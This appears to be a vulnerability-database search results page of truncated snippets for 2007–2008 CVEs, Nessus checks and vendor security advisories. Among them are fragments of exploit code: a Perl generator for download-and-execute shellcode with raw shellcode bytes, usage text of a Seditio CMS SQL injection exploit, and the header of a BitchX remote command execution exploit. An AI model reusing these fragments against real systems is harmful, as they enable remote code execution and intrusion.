2293 matches found
CVE-2008-2364
The approxyhttpprocessresponse function in modproxyhttp.c in the modproxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service memory consumption via a large number of interim...
FreeBSD : spamdyke -- open relay (555ac165-2bee-11dd-bbdc-00e0815b8da8)
Spamdyke Team reports : Fixed smtpfilter to reject the DATA command if no valid recipients have been specified. Otherwise, a specific scenario could result in every spamdyke installation being used as an open relay. If the remote server connects and gives one or more recipients that are rejected...
PHP 5.x < 5.2 Multiple Vulnerabilities
According to its banner, the version of PHP 5.x installed on the remote host is older than 5.2. Such versions may be affected by several buffer overflows. To exploit these issues, an attacker would need the ability to upload an arbitrary PHP script on the remote server or to manipulate several...
win32 Download and Execute Shellcode Generator (browsers edition)
No description provided by source. !/usr/bin/perl $loadingurl=$ARGV0; chomp $loadingurl; my @buffer; if $loadingurl eq "" $sco = 'ERROR!!! Enter url to remote exe.'; buffergen$sco; print @buffer; exit; $c= generatechar0; $sco= "\xE8\x56\x00\x00\x00\x53\x55\x56\x57\x8B\x6C\x24\x18\x8B\x45"...
[SECURITY] Fedora 8 Update: duplicity-0.4.9-1.fc8
Duplicity incrementally backs up files and directory by encrypting tar-format volumes with GnuPG and uploading them to a remote or local file server. In theory many protocols for connecting to a file server could be supported; so far ssh/scp, local file access, rsync, ftp, HSI, WebDAV and Amazon ...
MS08-003: Vulnerability in Active Directory Could Allow Denial of Service (946538)
The remote version of Active Directory contains a flaw in the LDAP request handler code that allows an attacker to crash the remote Active Directory server. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid31037; scriptversion"1.28"; scriptcvsdate"Date: 2018/11/15...
Hewlett-Packard OpenView Network Node Manager Multiple CGI Buffer Overflow Vulnerabilities
These vulnerabilities allow remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard HP OpenView Network Node Manager NNM. Authentication is not required to exploit these vulnerabilities. The specific flaws exists within the CGI applications that handle the...
CVE-2007-5355
The Web Proxy Auto-Discovery WPAD feature in Microsoft Internet Explorer 6 and 7, when a primary DNS suffix with three or more components is configured, resolves an unqualified wpad hostname in a second-level domain outside this configured DNS domain, which allows remote WPAD servers to conduct...
Seditio CMS 121 - SQL Injection
= 4.1, magicquotesgpc=Off echo "------------------------------------------------------------\n"; echo "Seditio CMS - use specific prefix default sed\n"; echo "-id= - use specific user id default 1\n\n"; echo "examples:\n"; echo "php $argv0 http://site.com/ -p=cms\n"; echo "php $argv0...
smf-blind.txt
SMF is a very hardened php application. If anyone wants an example of some interesting PHP security SMF is a good place to look. Even after being able to injection SQL I had to take another step and bypass some difficult filters found in the dbquery function. Ultimately i was able to do so. This...
FTP protocol PASV design flaw affects konqueror
The FTP protocol implementation in Konqueror 3.5.5 allows remote servers to force the client to connect to other servers, perform a proxied port scan, or obtain sensitive information by specifying an alternate server address in an FTP PASV response...
Microsoft Internet Explorer 文件上传处理漏洞
BUGTRAQ ID: 25836 Internet Explorer是微软发布的非常流行的WEB浏览器。 Internet Explorer在处理文件上传时存在漏洞,恶意网站可能利用此漏洞窃取用户系统上的文件。 通常由于安全限制JavaScript是不允许设置焦点或在文件上传字段中设置值,以防从用户机器上传任意文件。浏览器厂商在表单的文件字段中实施这个限制,计算机用户只有选择了文件才能上传。但如果用户使用IE访问了恶意网页的话,就可能窃取用户的焦点,绕过浏览器安全限制,在用户不知情的情况下向远端服务器上传任意文件 Microsoft Internet Explorer 6.0 SP1...
Web Server Transmits Cleartext Credentials
The remote web server contains several HTML form fields containing an input of type 'password' which transmit their information to a remote web server in cleartext. An attacker eavesdropping the traffic between web browser and server may obtain logins and passwords of valid users. C Tenable Netwo...
Design/Logic Flaw
Interpretation conflict in WinSCP before 4.0.4 allows remote attackers to perform arbitrary file transfers with a remote server via file-transfer commands in the final portion of a 1 scp, and possibly a 2 sftp or 3 ftp, URL, as demonstrated by a URL specifying login to the remote server with a...
CVE-2007-4909
WinSCP (before 4.0.4) is affected by an interpretation conflict in its URL handler that lets remote attackers perform arbitrary file transfers via certain scp/sftp/ftp URLs, by abusing a login-as-username on the URL which is parsed differently by the protocol handler. The issue is described as a ...
CVE-2007-4625
Polipo before 1.0.2 allows remote HTTP servers to cause a denial of service daemon crash by aborting the response to a POST request...
Buffer overflow
Multiple buffer overflows in the client in Toribash 2.71 and earlier allow remote attackers to 1 execute arbitrary code via a long game command in a replay .rpl file and 2 cause a denial of service application crash via a long SAY command that omits a required LF character; and allow remote...
BitchX 1.1-final (EXEC) Remote Command Execution Exploit
No description provided by source. / Name: PBXS - Pointless BitchX Sploit Author: clarity Infected Versions: 1.1-final and others? Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one can inject data structures allowing for the remote execution of commands! Usage:...
[SECURITY] Fedora Core 6 Update: postgresql-8.1.9-1.fc6
PostgreSQL is an advanced Object-Relational database management system DBMS that supports almost all SQL constructs including transactions, subselects and user-defined types and functions. The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DB...
OS Identification : SNMP
Nessus was able to identify the operating system type and version by examining the SNMP data returned by the remote server. C Tenable, Inc. Nessus was able to identify the operating system type and version by examining the SNMP data returned by the remote server. include"compat.inc"; if descripti...